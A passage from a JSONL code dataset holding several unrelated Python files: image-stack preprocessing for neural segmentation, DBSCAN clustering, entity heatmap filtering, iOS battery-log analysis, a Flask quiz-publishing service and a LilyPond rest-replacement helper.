ensure all 3d chunks have cnosistent z-dimension\r\n else:\r\n chunk_n+=1\r\n last_counter = 0\r\n last_cv_stack = []\r\n for files in list_of_files[-chunk_size:]:\r\n last_counter+=1\r\n last_img = cv2.imread(os.path.join(raw_single_tif_dir,files),cv2.IMREAD_UNCHANGED)\r\n last_cv_stack.append(last_img)\r\n if last_counter == chunk_size:\r\n last_cv_stack = np.asarray(last_cv_stack)\r\n imsave(os.path.join(chunk_dir,'chunk{}.tif'.format(chunk_n)),last_cv_stack)\r\n\r\n\r\ndef check_for_size_limit(chunk_dir):\r\n \"\"\"\r\n Will check and see if any of the file sizes in the input directory are greater than the available memory.\r\n If so a warning meessage will be printed to standard output\r\n\r\n :param chunk_dir: Input directory\r\n :return:\r\n \"\"\"\r\n memory_dict = dict(psutil.virtual_memory()._asdict())\r\n available_memory = memory_dict['available']\r\n\r\n for tif_stacks in [f for f in os.listdir(chunk_dir) if '.tif' in f]:\r\n tif_stack_image = os.path.join(chunk_dir,tif_stacks)\r\n tif_stack_size = os.path.getsize(tif_stack_image)\r\n\r\n if tif_stack_size > available_memory:\r\n print(\"WARNING: File {} is {} bytes. Your machine has {} bytes of available memory.\".format(tif_stack_image,tif_stack_size,available_memory))\r\n print(\"This may lead to crashing\")\r\n # sys.exit()\r\n\r\n\r\ndef myround64(x, base=64):\r\n return base * int(x/base)\r\n\r\ndef myround16(x,base=16):\r\n return base*int(x/base)\r\n\r\ndef process_specimen(ids,specimen_dir,raw_single_tif_dir,invert_image_color):\r\n \"\"\"\r\n Worker function for script that will do a number of pre-processing steps. Mostly focused on putting the input images\r\n into a format (dimensions and color inversion) the neural network will be compatible with. The network was trained with\r\n a patch size of 64x64x32 so we need to get images into nxmx32 dimension where n and m are nearest multiple of 64.\r\n\r\n This script expects an input directory of single tif images (not 3d tif volumes) named in naturally ascending\r\n order (i.e. 1.tif, 2.tif, 3.tif...) and will run the following:\r\n\r\n -- Get crop dimensions so input images are compatible with neural_network patch size\r\n -- Crop the images\r\n -- Stack the slices into chunks of 32 (check for memory limit)\r\n -- If number of slices is not a multiple of 32, there will be overlap in segmentation that is accounted for\r\n in ImageStack_To_Segmentation.py\r\n -- If memory limit is exceeded try splitting images into left and right (TODO update this to dynamically split in\r\n scenarios where left and right split still exceeds memory)\r\n -- Create raw input max intensity projections\r\n\r\n :param ids: specimen id\r\n :param specimen_dir: root directory for specimen\r\n :param raw_single_tif_dir: input directory of single tif images\r\n :param invert_image_color: boolean to invert images or not\r\n :return:\r\n \"\"\"\r\n\r\n error_list = []\r\n\r\n #Step 0. Define the chunk size for step 7\r\n chunk_size = 32\r\n\r\n #Step 1 was removed because it was not useful for consumers outside AIBS\r\n\r\n #Step 2. Choses last file in list of tif files and extracts crop dimensions\r\n try:\r\n list_of_files = os.listdir(raw_single_tif_dir)\r\n for files in list_of_files:\r\n if files.endswith('.tif'):\r\n filename_to_extract_crop_info = files\r\n\r\n # print('finding crop dimensions for {}'.format(ids))\r\n uncropped_img = cv2.imread(os.path.join(raw_single_tif_dir,filename_to_extract_crop_info),cv2.IMREAD_UNCHANGED)\r\n\r\n height, width = uncropped_img.shape\r\n\r\n height_nearest_mult_below = myround64(height)\r\n width_nearest_mult_below = myround64(width)\r\n\r\n x1,y1 = 0,0\r\n x2,y2 = width_nearest_mult_below,height_nearest_mult_below\r\n\r\n assert ((y2-y1)/64).is_integer() & ((x2-x1)/64).is_integer()\r\n\r\n except:\r\n print('{} coordinates for x-y crop are not divisible by 64'.format(ids))\r\n error_list.append('{} Step 2'.format(ids))\r\n\r\n\r\n #Step 3. Crop and invert each image\r\n try:\r\n for f in os.listdir(raw_single_tif_dir):\r\n if f.endswith('.tif'):\r\n img = cv2.imread(os.path.join(raw_single_tif_dir,f),cv2.IMREAD_UNCHANGED)\r\n cropped_img = img[y1:y2,x1:x2]\r\n\r\n if invert_image_color:\r\n cropped_img_inverted = 255 - cropped_img\r\n cv2.imwrite(os.path.join(raw_single_tif_dir,f), cropped_img_inverted)\r\n else:\r\n cv2.imwrite(os.path.join(raw_single_tif_dir, f), cropped_img)\r\n\r\n except:\r\n print('Unable to crop and invert images for {}'.format(ids))\r\n error_list.append('{} Step 3'.format(ids))\r\n\r\n\r\n\r\n #Step 4+5. Get list of tif files in subjects directory\r\n #Get an image x and y dimensions for bounding box\r\n try:\r\n # print('step 4')\r\n list_of_files = natsort.natsorted(os.listdir(raw_single_tif_dir))\r\n list_of_files = [f for f in list_of_files if '.tif' in f]\r\n\r\n # print('step 5')\r\n img_for_shape = cv2.imread(os.path.join(raw_single_tif_dir,list_of_files[1]),cv2.IMREAD_UNCHANGED)\r\n inverted_height, inverted_width = img_for_shape.shape\r\n print(inverted_height,inverted_width)\r\n except:\r\n print('Unable to crop and invert images for {}'.format(ids))\r\n error_list.append('{} Steps 4/5'.format(ids))\r\n\r\n\r\n #step 6. make outdir for 3d chunks\r\n # print('step 6')\r\n if os.path.isdir(os.path.join(specimen_dir,'Chunks_of_{}'.format(chunk_size))):\r\n chunk_dir = os.path.join(specimen_dir,'Chunks_of_{}'.format(chunk_size))\r\n else:\r\n os.mkdir(os.path.join(specimen_dir,'Chunks_of_{}'.format(chunk_size)))\r\n chunk_dir = os.path.join(specimen_dir,'Chunks_of_{}'.format(chunk_size))\r\n\r\n #Step 7. Make each segment of (chunk_size) tif images into one 3d chunk\r\n try:\r\n stack_into_chunks(chunk_size,raw_single_tif_dir,chunk_dir,ids)\r\n chunk_err = None\r\n left_and_right = False\r\n\r\n except ValueError:\r\n #This will fail with a memory error. I.E. you were trying to make 3D chunks, larger than the amount of RAM available\r\n\r\n chunk_err = 1\r\n print('Error Generating Chunk Tiffs for {}'.format(ids))\r\n print(\"Will try splitting images in half\")\r\n error_list.append('{} Value Error @ Step 7'.format(ids))\r\n left_and_right = True\r\n #Step 7.1 Delete 32 chunks directory and Make new directories for left and right\r\n try:\r\n shutil.rmtree(chunk_dir)\r\n\r\n #Make left and right directories\r\n raw_single_tif_dir_left = os.path.join(specimen_dir, 'Single_Tif_Images_Left')\r\n raw_single_tif_dir_right = os.path.join(specimen_dir,'Single_Tif_Images_Right')\r\n chunk_dir_left = os.path.join(specimen_dir,'Chunks_of_{}_Left'.format(chunk_size))\r\n chunk_dir_right = os.path.join(specimen_dir,'Chunks_of_{}_Right'.format(chunk_size))\r\n list_to_check = [raw_single_tif_dir_left,raw_single_tif_dir_right,chunk_dir_left,chunk_dir_right]\r\n for d in list_to_check:\r\n if not os.path.exists(d):\r\n os.mkdir(d)\r\n\r\n except:\r\n print('Error Generating Left Right Dirs for {}'.format(ids))\r\n error_list.append('{} Step 7.1'.format(ids))\r\n\r\n\r\n #Step 7.2 Check that when we divide by two (in half) we make two images with x-dim still a multiple of 64\r\n try:\r\n\r\n #Need to keep the x dimension of left and right tif files multiples of 64. This is only true if the width is\r\n # an EVEN multiple of 64\r\n #For example: lets say in step 3 we cropped the image to 6,464 (i.e. 64*101). Splitting this in half\r\n #will give 3,232 and 3,232 x-pixels in each left and right image. 3,232 is no longer a multiple of 64.\r\n #To solve this just use myround64 to find the closest 64x index and use that\r\n\r\n # print('Width/2 div 64 = {}'.format((inverted_width/2)/64))\r\n if ((int(inverted_width)/2)/64).is_integer():\r\n half_way_crop = int((inverted_width)/2)\r\n\r\n else:\r\n # print('NEED TO REINDEX FOR 64X')\r\n half_way_crop = int(myround64(inverted_width/2))\r\n\r\n #Loop through all individual tiffs and divide them\r\n for inverted_cropped_img in [tif_file for tif_file in natsort.natsorted(os.listdir(raw_single_tif_dir)) if '.tif' in tif_file]:\r\n processed_img_path = os.path.join(raw_single_tif_dir,inverted_cropped_img)\r\n processed_img = cv2.imread(processed_img_path,cv2.IMREAD_UNCHANGED)\r\n\r\n left_half = processed_img[0:int(inverted_height) , 0:half_way_crop]\r\n right_half = processed_img[0:int(inverted_height) , half_way_crop:int(inverted_width)]\r\n\r\n cv2.imwrite(os.path.join(raw_single_tif_dir_left,'Left_'+inverted_cropped_img), left_half)\r\n cv2.imwrite(os.path.join(raw_single_tif_dir_right,'Right_'+inverted_cropped_img), right_half)\r\n\r\n left_width = left_half.shape[1]\r\n right_width = right_half.shape[1]\r\n except:\r\n print('Error dividing tiffs into Left and Right images for {}'.format(ids))\r\n error_list.append('{} Step 7.2'.format(ids))\r\n\r\n #Step 7.3 Make Left and Right Chunks of 32\r\n try:\r\n #Now we can make our left and right chunks of 32\r\n # print('Making left and right chunks')\r\n stack_into_chunks(chunk_size,raw_single_tif_dir_left,chunk_dir_left,ids)\r\n stack_into_chunks(chunk_size,raw_single_tif_dir_right,chunk_dir_right,ids)\r\n except:\r\n print('Error Generating Left and Right Chunk Tiffs for {}'.format(ids))\r\n error_list.append('{} Step 7.3'.format(str(ids)))\r\n\r\n #Steps 8 and 9\r\n if chunk_err:\r\n\r\n #Step 8. Check the sizes of each chunk generated from step 7\r\n # print('step 8 chunk error')\r\n for chunky_directory in [chunk_dir_left,chunk_dir_right]:\r\n try:\r\n check_for_size_limit(chunky_directory)\r\n except:\r\n print('At least one of {} tif stacks exceeds 5Gb'.format(ids))\r\n error_list.append('{} Step 8'.format(ids))\r\n\r\n #Step 9. write bounding box for each side (0 0 0 y x chunk_size)\r\n try:\r\n bound_box_left = [0,0,0,left_width,inverted_height,chunk_size]\r\n bb_dir_L = os.path.join(specimen_dir,'bbox_{}_Left.csv'.format(ids))\r\n pd.DataFrame({'bound_boxing':bound_box_left}).to_csv(bb_dir_L.format(ids))\r\n\r\n bound_box_right = [0,0,0,right_width,inverted_height,chunk_size]\r\n bb_dir_R = os.path.join(specimen_dir,'bbox_{}_Right.csv'.format(ids))\r\n pd.DataFrame({'bound_boxing':bound_box_right}).to_csv(bb_dir_R.format(ids))\r\n\r\n except:\r\n print('Unable to make bounding box for {}'.format(ids))\r\n error_list.append('{} Step 9'.format(ids))\r\n\r\n else:\r\n #Step 8. Check the sizes of each chunk generated from step 7\r\n # print('step 8 no chunk error')\r\n check_for_size_limit(chunk_dir)\r\n\r\n #Step 9. Generate The Bounding Box File (0 0 0 y x chunk_size)\r\n try:\r\n # print('bounding box step')\r\n bound_box = [0,0,0,inverted_width,inverted_height,chunk_size]\r\n bb_dir = os.path.join(specimen_dir,'bbox_{}.csv'.format(ids))\r\n pd.DataFrame({'bound_boxing':bound_box}).to_csv(bb_dir.format(ids))\r\n except:\r\n print('Unable to make bounding box for {}'.format(ids))\r\n error_list.append('{} Step 9'.format(ids))\r\n\r\n #make mip for single tiff files dir and then delete those dirs\r\n if left_and_right == True:\r\n raw_single_tif_dir_right = os.path.join(specimen_dir,'Single_Tif_Images_Right')\r\n mip_ofile_right = os.path.join(specimen_dir,'Single_Tif_Images_Right_Mip.tif')\r\n\r\n raw_single_tif_dir_left = os.path.join(specimen_dir,'Single_Tif_Images_Left')\r\n mip_ofile_left = os.path.join(specimen_dir,'Single_Tif_Images_Left_Mip.tif')\r\n\r\n dir_to_mip(indir = raw_single_tif_dir_right, ofile = mip_ofile_right )\r\n dir_to_mip(indir = raw_single_tif_dir_left, ofile = mip_ofile_left )\r\n\r\n else:\r\n mip_ofile = os.path.join(specimen_dir,\"Single_Tif_Images_Mip.tif\")\r\n dir_to_mip(indir=raw_single_tif_dir, ofile = mip_ofile)\r\n\r\n return error_list\r\n\r\ndef dir_to_mip(indir,ofile,mip_axis=2):\r\n \"\"\"\r\n From a directory of single tif files, will create a maximum intensity projection (mip) along certain axis\r\n example: if mip_axis=2 creates xy mip\r\n \"\"\"\r\n\r\n indir_files = os.listdir(indir)\r\n img_0_pth = os.path.join(indir,indir_files[0])\r\n img_0 = cv2.imread(img_0_pth,cv2.IMREAD_UNCHANGED)\r\n data_type = img_0.dtype\r\n # print(img_0.shape,len(indir_files))\r\n\r\n full_img = np.zeros((img_0.shape[0],img_0.shape[1],len(indir_files)))\r\n ct=-1\r\n for fn in indir_files:\r\n ct+=1\r\n pth = os.path.join(indir,fn)\r\n img = cv2.imread(pth,cv2.IMREAD_UNCHANGED)\r\n full_img[:,:,ct] = img\r\n\r\n mip_z_axis = np.max(full_img, axis=mip_axis).astype(data_type)\r\n imsave(ofile,mip_z_axis)\r\n\r\n\r\ndef main(specimen_id, raw_single_tif_dir, specimen_dir, invert_image_color, **kwargs):\r\n\r\n if not specimen_dir:\r\n specimen_dir = os.path.dirname(raw_single_tif_dir)\r\n\r\n returned_error_list = process_specimen(specimen_id,specimen_dir, raw_single_tif_dir, invert_image_color)\r\n if returned_error_list!=[]:\r\n print(\"error occured in preprocessing:\")\r\n print(returned_error_list)\r\n\r\n else:\r\n print(\"Image Preprocessing Completed Without Error\")\r\n\r\nif __name__ == \"__main__\":\r\n\tmodule = ags.ArgSchemaParser(schema_type=InputSchema)\r\n\tmain(**module.args)\r\n","repo_name":"ogliko/patchseq-autorecon","sub_path":"pipeline/PreProcess_ImageStack.py","file_name":"PreProcess_ImageStack.py","file_ext":"py","file_size_in_byte":16222,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"39552817463","text":"import sys\nimport pandas as pd\nfrom enum import Enum, auto\nfrom collections import deque\n\nclass Label(Enum):\n UNASSIGN = auto()\n ASSIGN = auto()\n NOISE = auto()\n\n\nclass PointObj():\n def __init__(self, p):\n self.oid = p[1]\n self.x = p[2]\n self.y = p[3]\n self.label = Label.UNASSIGN\n \n def _dist(self, q): # euclidean distance with point p\n return ((self.x - q.x) ** 2 + (self.y - q.y) ** 2) ** 0.5\n \n def scanNeighbors(self, X, eps):\n neighbors = []\n for q in X:\n if q != self and self._dist(q) <= eps:\n neighbors.append(q)\n\n return neighbors\n \n def pushCluster(self, clusterSet, k):\n self.label = Label.ASSIGN\n if k in clusterSet:\n clusterSet[k].append(self.oid)\n else:\n clusterSet[k] = [self.oid]\n\ndef dbscan(X, eps, minpts, clusterSet):\n k = -1\n for p in X:\n if p.label == Label.UNASSIGN: # no visited\n neighbors = p.scanNeighbors(X, eps) # get neighbors in eps\n \n if len(neighbors) >= minpts: # this point is core\n k += 1\n p.pushCluster(clusterSet, k)\n \n queue = deque(neighbors)\n while queue:\n n = queue.popleft()\n\n if n.label != Label.ASSIGN:\n n.pushCluster(clusterSet, k)\n \n neighbors = n.scanNeighbors(X, eps)\n if len(neighbors) >= minpts: # this neighbor is also core\n queue.extend(neighbors)\n else:\n p.label = Label.NOISE\n\n\n\n\nif __name__ == '__main__':\n # command line arguments\n input_file_name = sys.argv[1]\n n = int(sys.argv[2])\n Eps = int(sys.argv[3])\n MinPts = int(sys.argv[4])\n\n # open files\n input_file = pd.read_csv('./data-3/' + input_file_name, '\\t', header=None, names=['object_id', 'x', 'y'])\n\n X = [PointObj(item) for item in input_file.itertuples()]\n clusterSet = {}\n dbscan(X, Eps, MinPts, clusterSet)\n\n clusters = sorted(clusterSet.values(), key=lambda x:len(x))\n while len(clusters) > n:\n del clusters[0]\n\n for i in range(n):\n fn = input_file_name.rstrip('.txt')\n pd.DataFrame(sorted(clusters[i])).to_csv(f'{fn}_cluster_{i}.txt', header=False, index=False)\n\n\n","repo_name":"be-simon/Data_Science_HYU_ITE4005","sub_path":"assignment3/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3883186125","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 17 00:41:19 2020\n\n@author: GEETHA RAJU\n\"\"\"\n\nimport pandas as pd\nimport csv\nimport numpy as np\nfrom numpy import genfromtxt\n\nfile = \"D:/Geetha/Python_WS/Spyder_WS/Thesis_Evaluation/Clear_HeatMap_Health.csv\"\n\nEntityList = [\"ORG\", \"GPE\", \"PERSON\",\t\"DATE\",\"TIME\", \"NORP\",\t\"LOCATION\", \"PRODUCT\", \"EVENTS\", \"PERCENT\", \"ORG-GPE\"\n \"ORG-PERSON\",\t\"ORG-DATE\",\t\"ORG-TIME\", \"ORG-NORP\", \"ORG-LOCATION\",\t\"ORG-PRODUCT\",\t\"ORG-EVENTS\",\t\"ORG-PERCENT\",\t\"GPE-PERSON\"\t\"GPE-DATE\",\n \"GPE-TIME\",\t\"GPE-NORP\",\t\"GPE-LOCATION\",\t\"GPE-PRODUCT\",\t\"GPE-EVENTS\",\t\"GPE-PERCENT\",\t\"PERSON-DATE\",\t\"PERSON-TIME\",\t\"PERSON-NOPR\",\n \"PERSON-LOCATION\",\t\"PERSON-PRODUCT\",\t\"PERSON-EVENTS\",\t\"PERSON-PERCENT\",\"DATE-TIME\t\",\"DATE-NORP\",\t\"DATE-LOCATION\",\"DATE-PRODUCT\",\t\"DATE-EVENTS\",\n \"DATE-PERCENT\",\t\"TIME-NOPR\",\t\"TIME-LOCATION\",\t\"TIME-PRODUCT\",\t\"TIME-EVENTS\",\t\"TIME-PERCENT\",\t\"NORP-LOCATION\",\t\"NORP-PRODUCT\",\t\"NORP-EVENTS\",\t\"NORP-PERCENT\",\n \"LOCATION-PRODUCT\",\t\"LOCATION-EVENT\", \"LOCATION-PERCENT\",\t\"PRODUCT-EVENTS\",\t \"PRODUCT-PERCENT\",\t\"EVENTS-PERCENT\"]\n\ndata = pd.read_csv(file) \ndata = data.fillna(0)\n\n\nmy_data = genfromtxt(file, delimiter=',')\n\nmy_data_clean = np.nan_to_num(my_data) \nresult = np.where(my_data_clean !=0)\n#result = np.where(my_data_clean<0 )\nprint('Tuple of arrays returned : ', result) \nlistOfCoordinates= list(zip(result[0], result[1])) \n\n\ndef unique(list1): \n \n # intilize a null list \n unique_list = [] \n \n # traverse for all elements \n for x in list1: \n # check if exists in unique_list or not \n if x not in unique_list: \n unique_list.append(x)\n \n return unique_list\n\nindex_1 = unique(result[0])\nindex_2 = unique(result[1])\n\ndata.head()\n\n#def getEntities(data, index_1, index_2):\n# print(\"index1:\")\n# for i in index_1:\n## print(i)\n# print(data['Entity'].iloc[i])\n# print(\"index2:\")\n# for i in index_2:\n## print(i)\n# print(data['Entity'].iloc[i])\n#\n#\n#getEntities(data, index_1, index_2)\n \n\n\n\ndef getEntitieCorNames(data, listOfCoordinates):\n one_one_list = []\n one_two_list = []\n two_two_list = []\n one_one_Entitylist = []\n one_two_Entitylist = []\n two_two_Entitylist = []\n entity = \"\"\n for p in listOfCoordinates:\n \n if(p[0]<=10 and p[1]<=10):\n print('{} : {}'.format(p[0], p[1]))\n# val = data.get_value(p[0]-1, p[1]-1, takeable = True)\n val = data[p[0]][p[1]]\n one_one_list.append(val) \n entity = EntityList[p[0]] + \" \" + EntityList[p[1]]\n one_one_Entitylist.append(entity)\n elif(p[0]<=10 and p[1]>10):\n print('{} : {}'.format(p[0], p[1]))\n# val = data.get_value(p[0]-1, p[1]-1,takeable = True)\n val = data[p[0]][p[1]]\n one_two_list.append(val)\n entity = EntityList[p[0]] + \" \" + EntityList[p[1]]\n one_two_Entitylist.append(entity)\n elif(p[0]>10 and p[1]>10):\n print('{} : {}'.format(p[0], p[1]))\n# val = data.get_value(p[0]-1,p[1]-1, takeable = True)\n val = data[p[0]][p[1]]\n two_two_list.append(val)\n entity = EntityList[p[0]] + \" \" + EntityList[p[1]]\n two_two_Entitylist.append(entity)\n return one_one_list, one_two_list, two_two_list, one_one_Entitylist, one_two_Entitylist, two_two_Entitylist\n \n\n\none, two, three, onelist, twolist, threelist = getEntitieCorNames(my_data_clean, listOfCoordinates)\n\nd1 = {'Entities': onelist,'Values':one}\ndf1 = pd.DataFrame(d1)\n\nd2 = {'Entities': twolist,'Values':two}\ndf2 = pd.DataFrame(d2)\n\nd3 = {'Entities': threelist,'Values':three}\ndf3 = pd.DataFrame(d3)\n\n# Create a Pandas Excel writer using XlsxWriter as the engine.\nwriter = pd.ExcelWriter('D:/Geetha/Python_WS/Spyder_WS/Thesis_Evaluation/NER/HealthPSE.xlsx', engine='xlsxwriter')\n\n# Write each dataframe to a different worksheet.\ndf1.to_excel(writer, sheet_name='one-one')\ndf2.to_excel(writer, sheet_name='one-two')\ndf3.to_excel(writer, sheet_name='two-two')\n\n# Close the Pandas Excel writer and output the Excel file.\nwriter.save()\n\n","repo_name":"GeethR/Sensitive-Tweet-Classification-with-NER","sub_path":"FilterPSEValues.py","file_name":"FilterPSEValues.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16759411691","text":"\nimport os\nimport json\nimport time\nimport sqlite3\n\n# 每天每小时的平均耗电量(average_hour) = 当天sum耗电量 / 当天运行时间\n# 每周的平均每小时耗电量 = Sum(average_hour) / 7\n\n\n# 计算每天每小时平均耗电量\n\n# 1. 在运行时间的表里和详细耗电量表中, 以时间稍微晚点的时间戳为基准, 开始统计另外一张表中的数据\n# 统计电量和运行时间\n\npath = '../destination.PLSQL'\nif not os.path.exists(path):\n path = './destination.PLSQL'\nconnect = sqlite3.connect(path)\ncursor = connect.cursor()\n\n# 找出运行时间的数据 每小时一条数据\ncursor.execute('select * from PLAppTimeService_Aggregate_AppRunTime where BundleID like \"%movesx\" order by timestamp asc')\ntimeDataArray = []\nfor row in cursor:\n timeDataArray.append(row)\n\n# 找出详细电量的数据\ncursor.execute('select * from PLAccountingOperator_Aggregate_RootNodeEnergy where NodeID is 34012 and RootNodeID = 48 order by timestamp asc')\nenergyData = []\nfor row in cursor:\n energyData.append(row)\n\n# 保证统计时间再同一时间区间内\nbaseStartTimestamp = 0\nbaseEndTimestamp = 0\n\nsum_backgroundtime = 0\nsum_screentime = 0\nsum_energy = 0\n\ndayset = set()\n\n# 数据结果\nruntimeDictionary = {}\nenergyDictionary = {}\n\n\n# 确定结束节点\nif timeDataArray[-1][1] < energyData[-1][1]:\n baseEndTimestamp = timeDataArray[-1][1]\nelse:\n baseEndTimestamp = energyData[-1][1]\n\nif timeDataArray[0][1] <= energyData[0][1]:\n # 电量数据统计的较晚, 以电量的数据为基准开始统计运行时间数据\n baseStartTimestamp = energyData[0][1]\n for row in timeDataArray:\n if row[1] >= baseStartTimestamp and row[1] <= baseEndTimestamp:\n # 开始取数据\n touple = time.localtime(round(row[1]))\n timeString = '%d-%02d-%02d' % (touple.tm_year,touple.tm_mon,touple.tm_mday)\n if timeString not in dayset:\n dayset.add(timeString)\n runtimeDictionary[timeString] = []\n runtimeDictionary[timeString].append(row[-1] + row[-4])\n print(row[-4])\n print(row[-1])\n sum_screentime += row[-1]\n sum_backgroundtime += row[-4] \n # 计算电量时间\n dayset = set()\n for row in energyData:\n if row[1] <= baseEndTimestamp:\n # 开始取数据\n touple = time.localtime(round(row[1]))\n timeString = '%d-%02d-%02d' % (touple.tm_year,touple.tm_mon,touple.tm_mday)\n if timeString not in dayset:\n dayset.add(timeString)\n energyDictionary[timeString] = []\n energyDictionary[timeString].append(round(row[-3] / 1000,2))\n sum_energy += row[-3]\n print('aikesi--电量统计数据开始较晚') \nelse:\n # 运行时间数据统计的较晚, 以运行时间的数据为基准开始统计电量数据 \n baseStartTimestamp = timeDataArray[0][1]\n for row in energyData:\n if row[1] >= baseStartTimestamp and row[1] <= baseEndTimestamp:\n # 开始取数据\n touple = time.localtime(round(row[1]))\n timeString = '%d-%02d-%02d' % (touple.tm_year,touple.tm_mon,touple.tm_mday)\n if timeString not in dayset:\n dayset.add(timeString)\n energyDictionary[timeString] = []\n energyDictionary[timeString].append(round(row[-3] / 1000, 2))\n sum_energy += row[-3]\n dayset = set()\n # 计算运行时间\n for row in timeDataArray:\n if row[1] <= baseEndTimestamp:\n # 开始取数据\n touple = time.localtime(round(row[1]))\n timeString = '%d-%02d-%02d' % (touple.tm_year,touple.tm_mon,touple.tm_mday)\n if timeString not in dayset:\n dayset.add(timeString)\n runtimeDictionary[timeString] = []\n runtimeDictionary[timeString].append(row[-1] + row[-4])\n sum_screentime += row[-1]\n sum_backgroundtime += row[-4]\n print('aikesi--运行时间统计数据开始较晚')\n\nprint(sum_energy) # 2473427.0000119996\nprint(sum_screentime) #4562\nprint(sum_backgroundtime) #381959\n\n'''\n// 最终字典格式为:\n// 运行时间\n{'12-07':[23,456,777,5454],\n'12-08':[23,456,777,5454],\n'12-09':[23,456,777,5454],}\n\n// 耗电量\n{'12-07':[22,44,11,44],\n'12-08':[23,22,43,22],\n'12-09':[33,11,2,4],}\n'''\n\ntest = [runtimeDictionary, energyDictionary]\nstring = json.dumps(test)\nf = open('./test.json','w')\nf.write(string)\nf.close()\n\n# 计算平均时间\nseries = []\nfor key, value in (energyDictionary.items()):\n if key in runtimeDictionary.keys():\n # 运行时间 小时\n totalTime = sum(runtimeDictionary[key]) / 3600 \n # 耗电量 mAh\n energyArr = energyDictionary[key]\n totalEnergy = sum(energyArr)\n average = totalEnergy / totalTime\n series.append(round(average,2))\n print(key,average)\n\nnodeTime = '12-14' # 新v1版本时间节点\nsum_beforNodeTime = 0\nsum_afterNodeTime = 0\narraiveNode = 10000\njump = 0\nfor index,key in enumerate(sorted(runtimeDictionary.keys())):\n if key not in energyDictionary.keys():\n jump-=1\n continue\n x = index + jump\n if key == nodeTime:\n arraiveNode = x + 1\n if x < arraiveNode and arraiveNode != 10000:\n sum_beforNodeTime += series[x]\n else:\n sum_afterNodeTime += series[x]\nif arraiveNode == 10000:\n arraiveNode = -1 \naverage_first_stage = sum_beforNodeTime / arraiveNode\naverage_second_stage = sum_afterNodeTime / (len(series) - 0)\ndata_average = [] \nfor x, v in enumerate(series):\n if x < arraiveNode:\n data_average.append(round(average_first_stage,2))\n else:\n data_average.append(round(average_second_stage,2)) \n\n# 计算每天的运行总时间\ntotalConsume = []\ntotalTime = []\n# 计算每天消耗���总电量\nfor k, v in energyDictionary.items():\n totalConsume.append(round(sum(v),2))\n if k in runtimeDictionary.keys():\n totalTime.append(round((sum(runtimeDictionary[k]) / 3600),2))\n\n\noption_average = {}\noption_average['title'] = {'text':'平均每天每小时耗电量, 起止日期: %s 至 %s' % (sorted(dayset)[0],sorted(dayset)[-1]),\n 'textStyle':{'color':\"#FFF\",'width':'100%','height':'40px',},\n 'textAlign':'center',\n 'left':'50%',\n 'top':'20px'\n } \noption_average['yAxis'] = [{'type':'value','name':'耗电量/小时(mAh)'}]\noption_average['xAxis'] = {'data':sorted(dayset),'name':'时间'}\noption_average['series'] = [{'type':'line','name':'平均每小时耗电量/天/mAh','data':series,'smooth':True},\n {'type':'line','name':'平均耗电量/mAh','data':data_average,'step':'middle','color':'red'}]\noption_average['dataZoom'] = [{'type':'inside'}]\noption_average['textStyle'] = {'color':'#ccc'}\noption_average['tooltip'] = {'trigger': 'axis'}\noption_average['legend'] = {'left':'10%','bottom':'10px','textStyle':{'color':'#aaa'}}\n\n# 当天平均每小时耗电量和 该阶段平均每小时耗电量\ndesPath = os.path.dirname(__file__) + '/average_hours.json'\nf = open(desPath,'w')\nf.write(json.dumps(option_average))\nf.close()\n\noption_average['title'] = {'text':'平均每天运行时长及耗电量, 起止日期: %s 至 %s' % (sorted(dayset)[0],sorted(dayset)[-1]),\n 'textStyle':{'color':\"#FFF\",'width':'100%','height':'40px',},\n 'textAlign':'center',\n 'left':'50%',\n 'top':'20px'\n } \noption_average['yAxis'] = [{'type':'value','name':'耗电量/天(mAh)'},{'type':'value','name':'运行时间/小时'}]\noption_average['xAxis'] = {'data':sorted(dayset),'name':'时间'}\noption_average['series'] = [{'type':'line','name':'总消耗/mAh','data':totalConsume,'smooth':True} , \n {'type':'line','name':'总运行时间/h','data':totalTime,'smooth':True,'yAxisIndex':1}]\noption_average['dataZoom'] = [{'type':'inside'}]\noption_average['textStyle'] = {'color':'#ccc'}\noption_average['tooltip'] = {'trigger': 'axis'}\noption_average['legend'] = {'left':'10%','bottom':'10px','textStyle':{'color':'#aaa'}}\n\n# 总运行时间和总的耗电量\ndesPath = os.path.dirname(__file__) + '/totalRunTime.json'\nf = open(desPath,'w')\nf.write(json.dumps(option_average))\nf.close()","repo_name":"aikesi128/Document","sub_path":"iOS/iOS 项目/电量数据库解析/calculate_average.py","file_name":"calculate_average.py","file_ext":"py","file_size_in_byte":8417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"6639236387","text":"from app.main import db\nfrom app.main.models.quizset import Quizset\nfrom app.main.models.teacher import Teacher\nfrom flask import jsonify\n\n\ndef publish_quiz(data):\n \"\"\"method to get all the quizset list to the model Quizset\n Args:\n data (dict): data which will be fetched from the quizset table\n using Quizset model\n Returns:\n dict, int: response object containing appropriate response based on the response from save changes,\n http response code specifying the success of getting data from table\n \"\"\"\n teacher = db.session.query(Teacher).filter_by(teacher_id=data['teacher_id']).first()\n if teacher:\n teacher_id = data['teacher_id']\n test_id = data['test_id']\n db.session.query(Quizset).filter_by(teacher_id=teacher_id).filter_by(\n test_id=test_id).update({Quizset.flag_publish_test: 1})\n db.session.commit()\n response_object = jsonify({\"response\": \"successfully Publish Quiz\"})\n return response_object, 200\n else:\n response_object = jsonify({\"response\": \"Authentication Required\"})\n return response_object, 407\n","repo_name":"masai-oss/quizera","sub_path":"src/server/app/main/services/publish_quiz.py","file_name":"publish_quiz.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13139519098","text":"from __future__ import unicode_literals\n\nimport ly.document\nimport ly.lex.lilypond\n\ndef replace_rest(cursor, replace_token):\n \"\"\"Replace full rests (r) with optional token. \"\"\"\n source = ly.document.Source(cursor, True, tokens_with_position=True)\n with cursor.document as d:\n for token in source:\n if isinstance(token, ly.lex.lilypond.Rest):\n if token == 'r':\n d[token.pos:token.end] = replace_token\n\ndef replace_fmrest(cursor, replace_token):\n \"\"\"Replace full measure rests (R) with optional token. 